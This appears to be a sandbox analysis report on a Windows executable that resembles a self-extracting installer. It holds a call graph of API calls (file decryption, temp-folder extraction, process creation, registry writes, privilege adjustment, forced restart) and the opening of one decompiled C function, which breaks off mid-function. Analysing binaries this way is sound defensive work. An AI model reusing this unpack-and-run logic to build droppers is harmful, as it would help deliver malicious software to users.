                                                                                                                                                                                                                                                Execution Coverage:28.7%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                                Total number of Nodes:961
                                                                                                                                                                                                                                                Total number of Limit Nodes:24
102fab LoadLibraryA 2451->2452 2453 102fc0 GetProcAddress 2452->2453 2454 102ff7 FreeLibrary 2452->2454 2453->2454 2457 102fd6 DecryptFileA 2453->2457 2455 103006 2454->2455 2456 103017 SetCurrentDirectoryA 2454->2456 2455->2456 2721 10621e GetWindowsDirectoryA 2455->2721 2458 103054 2456->2458 2459 103026 2456->2459 2457->2454 2464 102ff0 2457->2464 2461 103061 2458->2461 2731 103b26 2458->2731 2463 1044b9 20 API calls 2459->2463 2466 10307a 2461->2466 2461->2472 2740 10256d 2461->2740 2468 103037 2463->2468 2464->2454 2470 103098 2466->2470 2751 103ba2 2466->2751 2807 106285 GetLastError 2468->2807 2470->2472 2473 1030af 2470->2473 2472->2448 2809 104169 2473->2809 2477 1052d6 2476->2477 2485 105316 2476->2485 2480 105300 LocalFree LocalFree 2477->2480 2481 1052eb SetFileAttributesA DeleteFileA 2477->2481 2478 105374 2479 10538c 2478->2479 3115 101fe1 2478->3115 2482 106ce0 4 API calls 2479->2482 2480->2477 2480->2485 2481->2480 2484 102c72 2482->2484 2484->2385 2484->2393 2485->2478 2486 10535e SetCurrentDirectoryA 2485->2486 2487 1065e8 4 API calls 2485->2487 2488 102390 13 API calls 2486->2488 2487->2486 2488->2478 2490 101f9f 2489->2490 2491 101f9a 2489->2491 2493 1044b9 20 API calls 2490->2493 2496 101fd9 2490->2496 2497 101fc0 2490->2497 2492 101ea7 15 API calls 2491->2492 2492->2490 2493->2497 2494 101ee2 GetCurrentProcess OpenProcessToken 2499 101f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2494->2499 2500 101f0e 2494->2500 2495 101fcf ExitWindowsEx 2495->2496 2496->2385 2497->2494 2497->2495 2497->2496 2499->2500 2501 101f6b ExitWindowsEx 2499->2501 2503 1044b9 20 API calls 2500->2503 2501->2500 2502 101f1f 2501->2502 2504 106ce0 4 API calls 2502->2504 2503->2502 2505 101f8c 2504->2505 2505->2385 2507 1046b6 2506->2507 2508 102d1a 2506->2508 2507->2508 2509 1046be FindResourceA LoadResource LockResource 2507->2509 2508->2398 2508->2399 2509->2508 2510 1046df memcpy_s FreeResource 2509->2510 2510->2508 2518 105e17 2511->2518 2535 105cc3 
2511->2535 2512 105dd0 2516 105dec GetModuleFileNameA 2512->2516 2512->2518 2513 106ce0 4 API calls 2515 102e2c 2513->2515 2514 105ced CharNextA 2514->2535 2515->2413 2515->2414 2517 105e0a 2516->2517 2516->2518 2587 1066c8 2517->2587 2518->2513 2520 106218 2596 106e2a 2520->2596 2523 105e36 CharUpperA 2524 1061d0 2523->2524 2523->2535 2525 1044b9 20 API calls 2524->2525 2526 1061e7 2525->2526 2527 1061f0 CloseHandle 2526->2527 2528 1061f7 ExitProcess 2526->2528 2527->2528 2529 105f9f CharUpperA 2529->2535 2530 105f59 CompareStringA 2530->2535 2531 106003 CharUpperA 2531->2535 2532 105edc CharUpperA 2532->2535 2533 1060a2 CharUpperA 2533->2535 2534 10667f IsDBCSLeadByte CharNextA 2534->2535 2535->2512 2535->2514 2535->2518 2535->2520 2535->2523 2535->2529 2535->2530 2535->2531 2535->2532 2535->2533 2535->2534 2592 10658a 2535->2592 2538 1024cb 2537->2538 2541 1023b9 2537->2541 2539 106ce0 4 API calls 2538->2539 2540 1024dc 2539->2540 2540->2423 2541->2538 2542 1023e9 FindFirstFileA 2541->2542 2542->2538 2550 102407 2542->2550 2543 102421 lstrcmpA 2545 102431 lstrcmpA 2543->2545 2546 1024a9 FindNextFileA 2543->2546 2544 102479 2547 102488 SetFileAttributesA DeleteFileA 2544->2547 2545->2546 2545->2550 2548 1024bd FindClose RemoveDirectoryA 2546->2548 2546->2550 2547->2546 2548->2538 2549 10658a CharPrevA 2549->2550 2550->2543 2550->2544 2550->2546 2550->2549 2551 102390 5 API calls 2550->2551 2551->2550 2557 103737 2552->2557 2559 10372d 2552->2559 2553 1044b9 20 API calls 2554 1039fc 2553->2554 2555 106ce0 4 API calls 2554->2555 2556 102e92 2555->2556 2556->2402 2556->2423 2567 1018a3 2556->2567 2557->2554 2557->2559 2560 1038a4 2557->2560 2603 1028e8 2557->2603 2559->2553 2559->2554 2560->2554 2560->2559 2561 1039c1 MessageBeep 2560->2561 2562 10681f 10 API calls 2561->2562 2563 1039ce 2562->2563 2564 1039d8 MessageBoxA 2563->2564 2565 1067c9 EnumResourceLanguagesA 2563->2565 2564->2554 2565->2564 2568 1018d5 2567->2568 2574 1019b8 2567->2574 2632 1017ee 
LoadLibraryA 2568->2632 2570 106ce0 4 API calls 2572 1019d5 2570->2572 2572->2423 2572->2435 2573 1018e5 GetCurrentProcess OpenProcessToken 2573->2574 2575 101900 GetTokenInformation 2573->2575 2574->2570 2576 101918 GetLastError 2575->2576 2577 1019aa CloseHandle 2575->2577 2576->2577 2578 101927 LocalAlloc 2576->2578 2577->2574 2579 101938 GetTokenInformation 2578->2579 2580 1019a9 2578->2580 2581 1019a2 LocalFree 2579->2581 2582 10194e AllocateAndInitializeSid 2579->2582 2580->2577 2581->2580 2582->2581 2583 10196e 2582->2583 2584 101999 FreeSid 2583->2584 2585 101975 EqualSid 2583->2585 2586 10198c 2583->2586 2584->2581 2585->2583 2585->2586 2586->2584 2588 1066d5 2587->2588 2589 1066f3 2588->2589 2591 1066e5 CharNextA 2588->2591 2599 106648 2588->2599 2589->2518 2591->2588 2593 10659b 2592->2593 2593->2593 2594 1065b8 CharPrevA 2593->2594 2595 1065ab 2593->2595 2594->2595 2595->2535 2602 106cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2596->2602 2598 10621d 2600 10665d IsDBCSLeadByte 2599->2600 2601 106668 2599->2601 2600->2601 2601->2588 2602->2598 2604 102a62 2603->2604 2611 10290d 2603->2611 2605 102a75 2604->2605 2606 102a6e GlobalFree 2604->2606 2605->2560 2606->2605 2608 102955 GlobalAlloc 2608->2604 2609 102968 GlobalLock 2608->2609 2609->2604 2609->2611 2610 102a20 GlobalUnlock 2610->2611 2611->2604 2611->2608 2611->2610 2612 102a80 GlobalUnlock 2611->2612 2613 102773 2611->2613 2612->2604 2614 1028b2 2613->2614 2615 1027a3 CharUpperA CharNextA CharNextA 2613->2615 2616 1028b7 GetSystemDirectoryA 2614->2616 2615->2616 2617 1027db 2615->2617 2620 1028bf 2616->2620 2618 1027e3 2617->2618 2619 1028a8 GetWindowsDirectoryA 2617->2619 2624 10658a CharPrevA 2618->2624 2619->2620 2621 1028d2 2620->2621 2622 10658a CharPrevA 2620->2622 2623 106ce0 4 API calls 2621->2623 2622->2621 2625 1028e2 2623->2625 2626 102810 RegOpenKeyExA 2624->2626 2625->2611 2626->2620 2627 102837 RegQueryValueExA 2626->2627 2628 10289a 
RegCloseKey 2627->2628 2629 10285c 2627->2629 2628->2620 2630 102867 ExpandEnvironmentStringsA 2629->2630 2631 10287a 2629->2631 2630->2631 2631->2628 2633 101890 2632->2633 2634 101826 GetProcAddress 2632->2634 2635 106ce0 4 API calls 2633->2635 2636 101889 FreeLibrary 2634->2636 2637 101839 AllocateAndInitializeSid 2634->2637 2638 10189f 2635->2638 2636->2633 2637->2636 2640 10185f FreeSid 2637->2640 2638->2573 2638->2574 2640->2636 2642 10468f 7 API calls 2641->2642 2643 1051f9 LocalAlloc 2642->2643 2644 10522d 2643->2644 2645 10520d 2643->2645 2647 10468f 7 API calls 2644->2647 2646 1044b9 20 API calls 2645->2646 2648 10521e 2646->2648 2649 10523a 2647->2649 2650 106285 GetLastError 2648->2650 2651 105262 lstrcmpA 2649->2651 2652 10523e 2649->2652 2659 102f4d 2650->2659 2653 105272 LocalFree 2651->2653 2654 10527e 2651->2654 2655 1044b9 20 API calls 2652->2655 2653->2659 2656 1044b9 20 API calls 2654->2656 2657 10524f LocalFree 2655->2657 2658 105290 LocalFree 2656->2658 2657->2659 2658->2659 2659->2437 2659->2440 2659->2472 2661 10468f 7 API calls 2660->2661 2662 105175 2661->2662 2663 10517a 2662->2663 2664 1051af 2662->2664 2665 1044b9 20 API calls 2663->2665 2666 10468f 7 API calls 2664->2666 2667 10518d 2665->2667 2668 1051c0 2666->2668 2667->2442 2822 106298 2668->2822 2671 1051e1 2671->2442 2672 1044b9 20 API calls 2672->2667 2674 10468f 7 API calls 2673->2674 2675 1055c7 LocalAlloc 2674->2675 2676 1055db 2675->2676 2677 1055fd 2675->2677 2679 1044b9 20 API calls 2676->2679 2678 10468f 7 API calls 2677->2678 2680 10560a 2678->2680 2681 1055ec 2679->2681 2683 105632 lstrcmpA 2680->2683 2684 10560e 2680->2684 2682 106285 GetLastError 2681->2682 2696 1055f1 2682->2696 2686 105645 2683->2686 2687 10564b LocalFree 2683->2687 2685 1044b9 20 API calls 2684->2685 2688 10561f LocalFree 2685->2688 2686->2687 2689 105696 2687->2689 2690 10565b 2687->2690 2688->2696 2691 10589f 2689->2691 2694 1056ae GetTempPathA 2689->2694 2695 105467 49 API calls 2690->2695 2692 
106517 24 API calls 2691->2692 2692->2696 2693 106ce0 4 API calls 2697 102f7e 2693->2697 2698 1056c3 2694->2698 2701 1056eb 2694->2701 2699 105678 2695->2699 2696->2693 2697->2450 2697->2472 2834 105467 2698->2834 2699->2696 2703 1044b9 20 API calls 2699->2703 2701->2696 2704 105717 GetDriveTypeA 2701->2704 2705 10586c GetWindowsDirectoryA 2701->2705 2703->2696 2706 105730 GetFileAttributesA 2704->2706 2719 10572b 2704->2719 2868 10597d GetCurrentDirectoryA SetCurrentDirectoryA 2705->2868 2706->2719 2710 105467 49 API calls 2710->2701 2711 102630 21 API calls 2711->2719 2713 1057c1 GetWindowsDirectoryA 2713->2719 2714 10597d 34 API calls 2714->2719 2715 10658a CharPrevA 2716 1057e8 GetFileAttributesA 2715->2716 2717 1057fa CreateDirectoryA 2716->2717 2716->2719 2717->2719 2718 105827 SetFileAttributesA 2718->2719 2719->2696 2719->2704 2719->2705 2719->2706 2719->2711 2719->2713 2719->2714 2719->2715 2719->2718 2720 105467 49 API calls 2719->2720 2864 106952 2719->2864 2720->2719 2722 106268 2721->2722 2723 106249 2721->2723 2725 10597d 34 API calls 2722->2725 2724 1044b9 20 API calls 2723->2724 2726 10625a 2724->2726 2727 10625f 2725->2727 2728 106285 GetLastError 2726->2728 2729 106ce0 4 API calls 2727->2729 2728->2727 2730 103013 2729->2730 2730->2456 2730->2472 2732 103b2d 2731->2732 2732->2732 2733 103b72 2732->2733 2735 103b53 2732->2735 2934 104fe0 2733->2934 2736 106517 24 API calls 2735->2736 2737 103b70 2736->2737 2738 106298 10 API calls 2737->2738 2739 103b7b 2737->2739 2738->2739 2739->2461 2741 102622 2740->2741 2742 102583 2740->2742 2961 1024e0 GetWindowsDirectoryA 2741->2961 2744 1025e8 RegOpenKeyExA 2742->2744 2745 10258b 2742->2745 2746 1025e3 2744->2746 2747 102609 RegQueryInfoKeyA 2744->2747 2745->2746 2749 10259b RegOpenKeyExA 2745->2749 2746->2466 2748 1025d1 RegCloseKey 2747->2748 2748->2746 2749->2746 2750 1025bc RegQueryValueExA 2749->2750 2750->2748 2752 103bdb 2751->2752 2764 103bec 2751->2764 2753 10468f 7 API calls 2752->2753 2753->2764 
2754 103c03 memset 2754->2764 2755 103d13 2756 1044b9 20 API calls 2755->2756 2762 103d26 2756->2762 2757 10468f 7 API calls 2757->2764 2759 106ce0 4 API calls 2760 103f60 2759->2760 2760->2470 2761 103d7b CompareStringA 2761->2764 2773 103fd7 2761->2773 2762->2759 2763 103fab 2767 1044b9 20 API calls 2763->2767 2764->2754 2764->2755 2764->2757 2764->2761 2764->2762 2764->2763 2768 103f46 LocalFree 2764->2768 2769 103f1e LocalFree 2764->2769 2764->2773 2774 103cc7 CompareStringA 2764->2774 2785 103e10 2764->2785 2969 101ae8 2764->2969 3010 10202a memset memset RegCreateKeyExA 2764->3010 3036 103fef 2764->3036 2771 103fbe LocalFree 2767->2771 2768->2762 2769->2764 2769->2773 2771->2762 2773->2762 3060 102267 2773->3060 2774->2764 2775 103f92 2778 1044b9 20 API calls 2775->2778 2776 103e1f GetProcAddress 2777 103f64 2776->2777 2776->2785 2779 1044b9 20 API calls 2777->2779 2780 103fa9 2778->2780 2781 103f75 FreeLibrary 2779->2781 2782 103f7c LocalFree 2780->2782 2781->2782 2783 106285 GetLastError 2782->2783 2784 103f8b 2783->2784 2784->2762 2785->2775 2785->2776 2786 103f40 FreeLibrary 2785->2786 2787 103eff FreeLibrary 2785->2787 3050 106495 2785->3050 2786->2768 2787->2769 2789 10468f 7 API calls 2788->2789 2790 103a55 LocalAlloc 2789->2790 2791 103a6c 2790->2791 2792 103a8e 2790->2792 2793 1044b9 20 API calls 2791->2793 2794 10468f 7 API calls 2792->2794 2795 103a7d 2793->2795 2796 103a98 2794->2796 2797 106285 GetLastError 2795->2797 2798 103ac5 lstrcmpA 2796->2798 2799 103a9c 2796->2799 2805 102f64 2797->2805 2801 103ada 2798->2801 2802 103b0d LocalFree 2798->2802 2800 1044b9 20 API calls 2799->2800 2803 103aad LocalFree 2800->2803 2804 106517 24 API calls 2801->2804 2802->2805 2803->2805 2806 103aec LocalFree 2804->2806 2805->2437 2805->2472 2806->2805 2808 10628f 2807->2808 2808->2472 2810 10468f 7 API calls 2809->2810 2811 10417d LocalAlloc 2810->2811 2812 104195 2811->2812 2813 1041a8 2811->2813 2814 1044b9 20 API calls 2812->2814 2815 10468f 7 API calls 
2813->2815 2817 1041a6 2814->2817 2816 1041b5 2815->2816 2818 1041c5 lstrcmpA 2816->2818 2819 1041b9 2816->2819 2817->2472 2818->2819 2820 1041e6 LocalFree 2818->2820 2821 1044b9 20 API calls 2819->2821 2820->2817 2821->2820 2823 10171e _vsnprintf 2822->2823 2824 1062c9 FindResourceA 2823->2824 2826 106353 2824->2826 2827 1062cb LoadResource LockResource 2824->2827 2828 106ce0 4 API calls 2826->2828 2827->2826 2830 1062e0 2827->2830 2829 1051ca 2828->2829 2829->2671 2829->2672 2831 106355 FreeResource 2830->2831 2832 10631b FreeResource 2830->2832 2831->2826 2833 10171e _vsnprintf 2832->2833 2833->2824 2835 10548a 2834->2835 2853 10551a 2834->2853 2894 1053a1 2835->2894 2837 105581 2841 106ce0 4 API calls 2837->2841 2840 105495 2840->2837 2844 1054c2 GetSystemInfo 2840->2844 2845 10550c 2840->2845 2846 10559a 2841->2846 2842 10553b CreateDirectoryA 2847 105577 2842->2847 2848 105547 2842->2848 2843 10554d 2843->2837 2852 10597d 34 API calls 2843->2852 2851 1054da 2844->2851 2849 10658a CharPrevA 2845->2849 2846->2696 2858 102630 GetWindowsDirectoryA 2846->2858 2850 106285 GetLastError 2847->2850 2848->2843 2849->2853 2854 10557c 2850->2854 2851->2845 2856 10658a CharPrevA 2851->2856 2855 10555c 2852->2855 2905 1058c8 2853->2905 2854->2837 2855->2837 2857 105568 RemoveDirectoryA 2855->2857 2856->2845 2857->2837 2859 10265e 2858->2859 2860 10266f 2858->2860 2861 1044b9 20 API calls 2859->2861 2862 106ce0 4 API calls 2860->2862 2861->2860 2863 102687 2862->2863 2863->2701 2863->2710 2865 1069a1 2864->2865 2866 10696e GetDiskFreeSpaceA 2864->2866 2865->2719 2866->2865 2867 106989 MulDiv 2866->2867 2867->2865 2869 1059bb 2868->2869 2870 1059dd GetDiskFreeSpaceA 2868->2870 2873 1044b9 20 API calls 2869->2873 2871 105ba1 memset 2870->2871 2872 105a21 MulDiv 2870->2872 2874 106285 GetLastError 2871->2874 2872->2871 2875 105a50 GetVolumeInformationA 2872->2875 2876 1059cc 2873->2876 2877 105bbc GetLastError FormatMessageA 2874->2877 2878 105ab5 SetCurrentDirectoryA 
2875->2878 2879 105a6e memset 2875->2879 2880 106285 GetLastError 2876->2880 2881 105be3 2877->2881 2889 105acc 2878->2889 2882 106285 GetLastError 2879->2882 2887 1059d1 2880->2887 2883 1044b9 20 API calls 2881->2883 2884 105a89 GetLastError FormatMessageA 2882->2884 2885 105bf5 SetCurrentDirectoryA 2883->2885 2884->2881 2885->2887 2886 106ce0 4 API calls 2888 105c11 2886->2888 2887->2886 2888->2701 2890 105b0a 2889->2890 2892 105b20 2889->2892 2891 1044b9 20 API calls 2890->2891 2891->2887 2892->2887 2917 10268b 2892->2917 2896 1053bf 2894->2896 2895 10171e _vsnprintf 2895->2896 2896->2895 2897 10658a CharPrevA 2896->2897 2900 105415 GetTempFileNameA 2896->2900 2898 1053fa RemoveDirectoryA GetFileAttributesA 2897->2898 2898->2896 2899 10544f CreateDirectoryA 2898->2899 2899->2900 2901 10543a 2899->2901 2900->2901 2902 105429 DeleteFileA CreateDirectoryA 2900->2902 2903 106ce0 4 API calls 2901->2903 2902->2901 2904 105449 2903->2904 2904->2840 2906 1058d8 2905->2906 2906->2906 2907 1058df LocalAlloc 2906->2907 2908 1058f3 2907->2908 2909 105919 2907->2909 2910 1044b9 20 API calls 2908->2910 2912 10658a CharPrevA 2909->2912 2916 105906 2910->2916 2911 106285 GetLastError 2914 105534 2911->2914 2913 105931 CreateFileA LocalFree 2912->2913 2915 10595b CloseHandle GetFileAttributesA 2913->2915 2913->2916 2914->2842 2914->2843 2915->2916 2916->2911 2916->2914 2918 1026e5 2917->2918 2919 1026b9 2917->2919 2921 1026ea 2918->2921 2922 10271f 2918->2922 2920 10171e _vsnprintf 2919->2920 2924 1026cc 2920->2924 2923 10171e _vsnprintf 2921->2923 2926 10171e _vsnprintf 2922->2926 2932 1026e3 2922->2932 2925 1026fd 2923->2925 2928 1044b9 20 API calls 2924->2928 2929 1044b9 20 API calls 2925->2929 2930 102735 2926->2930 2927 106ce0 4 API calls 2931 10276d 2927->2931 2928->2932 2929->2932 2933 1044b9 20 API calls 2930->2933 2931->2887 2932->2927 2933->2932 2935 10468f 7 API calls 2934->2935 2936 104ff5 FindResourceA LoadResource LockResource 2935->2936 2937 105020 2936->2937 2950 
10515f 2936->2950 2938 105057 2937->2938 2939 105029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2937->2939 2953 104efd 2938->2953 2939->2938 2942 105060 2944 1044b9 20 API calls 2942->2944 2943 10507c 2945 105075 2943->2945 2947 1044b9 20 API calls 2943->2947 2944->2945 2946 105110 FreeResource 2945->2946 2948 10511d 2945->2948 2946->2948 2947->2945 2949 10513a 2948->2949 2951 1044b9 20 API calls 2948->2951 2949->2950 2952 10514c SendMessageA 2949->2952 2950->2737 2951->2949 2952->2950 2954 104f4a 2953->2954 2955 104980 25 API calls 2954->2955 2960 104fa1 2954->2960 2957 104f67 2955->2957 2956 106ce0 4 API calls 2958 104fc6 2956->2958 2959 104b60 FindCloseChangeNotification 2957->2959 2957->2960 2958->2942 2958->2943 2959->2960 2960->2956 2962 102510 2961->2962 2963 10255b 2961->2963 2965 10658a CharPrevA 2962->2965 2964 106ce0 4 API calls 2963->2964 2966 102569 2964->2966 2967 102522 WritePrivateProfileStringA _lopen 2965->2967 2966->2746 2967->2963 2968 102548 _llseek _lclose 2967->2968 2968->2963 2970 101b25 2969->2970 3074 101a84 2970->3074 2972 101b57 2973 10658a CharPrevA 2972->2973 2975 101b8c 2972->2975 2973->2975 2974 1066c8 2 API calls 2976 101bd1 2974->2976 2975->2974 2977 101d73 2976->2977 2978 101bd9 CompareStringA 2976->2978 2980 1066c8 2 API calls 2977->2980 2978->2977 2979 101bf7 GetFileAttributesA 2978->2979 2981 101d53 2979->2981 2982 101c0d 2979->2982 2983 101d7d 2980->2983 2984 101d64 2981->2984 2982->2981 2989 101a84 2 API calls 2982->2989 2985 101d81 CompareStringA 2983->2985 2986 101df8 LocalAlloc 2983->2986 2987 1044b9 20 API calls 2984->2987 2985->2986 2995 101d9b 2985->2995 2986->2984 2988 101e0b GetFileAttributesA 2986->2988 2990 101d6c 2987->2990 2991 101e1d 2988->2991 3008 101e45 2988->3008 2992 101c31 2989->2992 2994 106ce0 4 API calls 2990->2994 2991->3008 2993 101c50 LocalAlloc 2992->2993 2998 101a84 2 API calls 2992->2998 2993->2984 2996 101c67 GetPrivateProfileIntA GetPrivateProfileStringA 2993->2996 2997 101ea1 2994->2997 
2995->2995 2999 101dbe LocalAlloc 2995->2999 3002 101cf8 2996->3002 3007 101cc2 2996->3007 2997->2764 2998->2993 2999->2984 3003 101de1 2999->3003 3004 101d23 3002->3004 3005 101d09 GetShortPathNameA 3002->3005 3006 10171e _vsnprintf 3003->3006 3009 10171e _vsnprintf 3004->3009 3005->3004 3006->3007 3007->2990 3080 102aac 3008->3080 3009->3007 3011 10209a 3010->3011 3019 102256 3010->3019 3014 10171e _vsnprintf 3011->3014 3016 1020dc 3011->3016 3012 106ce0 4 API calls 3013 102263 3012->3013 3013->2764 3015 1020af RegQueryValueExA 3014->3015 3015->3011 3015->3016 3017 1020e4 RegCloseKey 3016->3017 3018 1020fb GetSystemDirectoryA 3016->3018 3017->3019 3020 10658a CharPrevA 3018->3020 3019->3012 3021 10211b LoadLibraryA 3020->3021 3022 102179 GetModuleFileNameA 3021->3022 3023 10212e GetProcAddress FreeLibrary 3021->3023 3025 1021de RegCloseKey 3022->3025 3028 102177 3022->3028 3023->3022 3024 10214e GetSystemDirectoryA 3023->3024 3026 102165 3024->3026 3024->3028 3025->3019 3027 10658a CharPrevA 3026->3027 3027->3028 3028->3028 3029 1021b7 LocalAlloc 3028->3029 3030 1021ec 3029->3030 3031 1021cd 3029->3031 3033 10171e _vsnprintf 3030->3033 3032 1044b9 20 API calls 3031->3032 3032->3025 3034 102218 RegSetValueExA RegCloseKey LocalFree 3033->3034 3034->3019 3037 104016 CreateProcessA 3036->3037 3048 104106 3036->3048 3038 104041 WaitForSingleObject GetExitCodeProcess 3037->3038 3039 1040c4 3037->3039 3042 104070 3038->3042 3041 106285 GetLastError 3039->3041 3040 106ce0 4 API calls 3043 104117 3040->3043 3044 1040c9 GetLastError FormatMessageA 3041->3044 3107 10411b 3042->3107 3043->2764 3046 1044b9 20 API calls 3044->3046 3046->3048 3047 104096 CloseHandle CloseHandle 3047->3048 3049 1040ba 3047->3049 3048->3040 3049->3048 3051 1064c2 3050->3051 3052 10658a CharPrevA 3051->3052 3053 1064d8 GetFileAttributesA 3052->3053 3054 106501 LoadLibraryA 3053->3054 3055 1064ea 3053->3055 3057 106508 3054->3057 3055->3054 3056 1064ee LoadLibraryExA 3055->3056 3056->3057 3058 
106ce0 4 API calls 3057->3058 3059 106513 3058->3059 3059->2785 3061 102381 3060->3061 3062 102289 RegOpenKeyExA 3060->3062 3063 106ce0 4 API calls 3061->3063 3062->3061 3064 1022b1 RegQueryValueExA 3062->3064 3065 10238c 3063->3065 3066 102374 RegCloseKey 3064->3066 3067 1022e6 memset GetSystemDirectoryA 3064->3067 3065->2762 3066->3061 3068 102321 3067->3068 3069 10230f 3067->3069 3071 10171e _vsnprintf 3068->3071 3070 10658a CharPrevA 3069->3070 3070->3068 3072 10233f 3071->3072 3072->3072 3073 102353 RegSetValueExA 3072->3073 3073->3066 3075 101a9a 3074->3075 3077 101aba 3075->3077 3079 101aaf 3075->3079 3093 10667f 3075->3093 3077->2972 3078 10667f 2 API calls 3078->3079 3079->3077 3079->3078 3081 102ad4 GetModuleFileNameA 3080->3081 3082 102be6 3080->3082 3092 102b02 3081->3092 3083 106ce0 4 API calls 3082->3083 3085 102bf5 3083->3085 3084 102af1 IsDBCSLeadByte 3084->3092 3085->2990 3086 102b11 CharNextA CharUpperA 3089 102b8d CharUpperA 3086->3089 3086->3092 3087 102bca CharNextA 3088 102bd3 CharNextA 3087->3088 3088->3092 3089->3092 3091 102b43 CharPrevA 3091->3092 3092->3082 3092->3084 3092->3086 3092->3087 3092->3088 3092->3091 3098 1065e8 3092->3098 3094 106689 3093->3094 3095 1066a5 3094->3095 3096 106648 IsDBCSLeadByte 3094->3096 3097 106697 CharNextA 3094->3097 3095->3075 3096->3094 3097->3094 3099 1065f4 3098->3099 3099->3099 3100 1065fb CharPrevA 3099->3100 3101 106611 CharPrevA 3100->3101 3102 10660b 3101->3102 3103 10661e 3101->3103 3102->3101 3102->3103 3104 10663d 3103->3104 3105 106634 CharNextA 3103->3105 3106 106627 CharPrevA 3103->3106 3104->3092 3105->3104 3106->3104 3106->3105 3108 104132 3107->3108 3110 10412a 3107->3110 3111 101ea7 3108->3111 3110->3047 3112 101ed3 3111->3112 3113 101eba 3111->3113 3112->3110 3114 10256d 15 API calls 3113->3114 3114->3112 3116 101ff0 RegOpenKeyExA 3115->3116 3117 102026 3115->3117 3116->3117 3118 10200f RegDeleteValueA RegCloseKey 3116->3118 3117->2479 3118->3117 3266 106a20 __getmainargs 3267 1019e0 
3268 101a03 3267->3268 3269 101a24 GetDesktopWindow 3267->3269 3270 101a20 3268->3270 3272 101a16 EndDialog 3268->3272 3271 1043d0 11 API calls 3269->3271 3274 106ce0 4 API calls 3270->3274 3273 101a33 LoadStringA SetDlgItemTextA MessageBeep 3271->3273 3272->3270 3273->3270 3275 101a7e 3274->3275 3276 106bef _XcptFilter

Callgraph


[Control-flow Graph: nodes marked Executed / Not Executed]
                                                                                                                                                                                                                                                C-Code - Quality: 82%
                                                                                                                                                                                                                                                			E00103BA2() {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				signed int _v12;
                                                                                                                                                                                                                                                				char _v276;
                                                                                                                                                                                                                                                				char _v280;
                                                                                                                                                                                                                                                				short _v300;
                                                                                                                                                                                                                                                				intOrPtr _v304;
                                                                                                                                                                                                                                                				void _v348;
                                                                                                                                                                                                                                                				char _v352;
                                                                                                                                                                                                                                                				intOrPtr _v356;
                                                                                                                                                                                                                                                				signed int _v360;
                                                                                                                                                                                                                                                				short _v364;
                                                                                                                                                                                                                                                				char* _v368;
                                                                                                                                                                                                                                                				intOrPtr _v372;
                                                                                                                                                                                                                                                				void* _v376;
                                                                                                                                                                                                                                                				intOrPtr _v380;
                                                                                                                                                                                                                                                				char _v384;
                                                                                                                                                                                                                                                				signed int _v388;
                                                                                                                                                                                                                                                				intOrPtr _v392;
                                                                                                                                                                                                                                                				signed int _v396;
                                                                                                                                                                                                                                                				signed int _v400;
                                                                                                                                                                                                                                                				signed int _v404;
                                                                                                                                                                                                                                                				void* _v408;
                                                                                                                                                                                                                                                				void* _v424;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t69;
                                                                                                                                                                                                                                                				signed int _t76;
                                                                                                                                                                                                                                                				void* _t77;
                                                                                                                                                                                                                                                				signed int _t79;
                                                                                                                                                                                                                                                				short _t96;
                                                                                                                                                                                                                                                				signed int _t97;
                                                                                                                                                                                                                                                				intOrPtr _t98;
                                                                                                                                                                                                                                                				signed int _t101;
                                                                                                                                                                                                                                                				signed int _t104;
                                                                                                                                                                                                                                                				signed int _t108;
                                                                                                                                                                                                                                                				int _t112;
                                                                                                                                                                                                                                                				void* _t115;
                                                                                                                                                                                                                                                				signed char _t118;
                                                                                                                                                                                                                                                				void* _t125;
                                                                                                                                                                                                                                                				signed int _t127;
                                                                                                                                                                                                                                                				void* _t128;
                                                                                                                                                                                                                                                				struct HINSTANCE__* _t129;
                                                                                                                                                                                                                                                				void* _t130;
                                                                                                                                                                                                                                                				short _t137;
                                                                                                                                                                                                                                                				char* _t140;
                                                                                                                                                                                                                                                				signed char _t144;
                                                                                                                                                                                                                                                				signed char _t145;
                                                                                                                                                                                                                                                				signed int _t149;
                                                                                                                                                                                                                                                				void* _t150;
                                                                                                                                                                                                                                                				void* _t151;
                                                                                                                                                                                                                                                				signed int _t153;
                                                                                                                                                                                                                                                				void* _t155;
                                                                                                                                                                                                                                                				void* _t156;
                                                                                                                                                                                                                                                				signed int _t157;
                                                                                                                                                                                                                                                				signed int _t162;
                                                                                                                                                                                                                                                				signed int _t164;
                                                                                                                                                                                                                                                				void* _t165;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                                                                                                                                                                                                                				_t69 =  *0x108004; // 0xb5a2e1bc
                                                                                                                                                                                                                                                				_v8 = _t69 ^ _t164;
                                                                                                                                                                                                                                                				_t153 = 0;
                                                                                                                                                                                                                                                				 *0x109124 =  *0x109124 & 0;
                                                                                                                                                                                                                                                				_t149 = 0;
                                                                                                                                                                                                                                                				_v388 = 0;
                                                                                                                                                                                                                                                				_v384 = 0;
                                                                                                                                                                                                                                                				_t165 =  *0x108a28 - _t153; // 0x0
                                                                                                                                                                                                                                                				if(_t165 != 0) {
                                                                                                                                                                                                                                                					L3:
                                                                                                                                                                                                                                                					_t127 = 0;
                                                                                                                                                                                                                                                					_v392 = 0;
                                                                                                                                                                                                                                                					while(1) {
                                                                                                                                                                                                                                                						_v400 = _v400 & 0x00000000;
                                                                                                                                                                                                                                                						memset( &_v348, 0, 0x44);
                                                                                                                                                                                                                                                						_t164 = _t164 + 0xc;
                                                                                                                                                                                                                                                						_v348 = 0x44;
                                                                                                                                                                                                                                                						if( *0x108c42 != 0) {
                                                                                                                                                                                                                                                							goto L26;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t146 =  &_v396;
                                                                                                                                                                                                                                                						_t115 = E0010468F("SHOWWINDOW",  &_v396, 4);
                                                                                                                                                                                                                                                						if(_t115 == 0 || _t115 > 4) {
                                                                                                                                                                                                                                                							L25:
                                                                                                                                                                                                                                                							_t146 = 0x4b1;
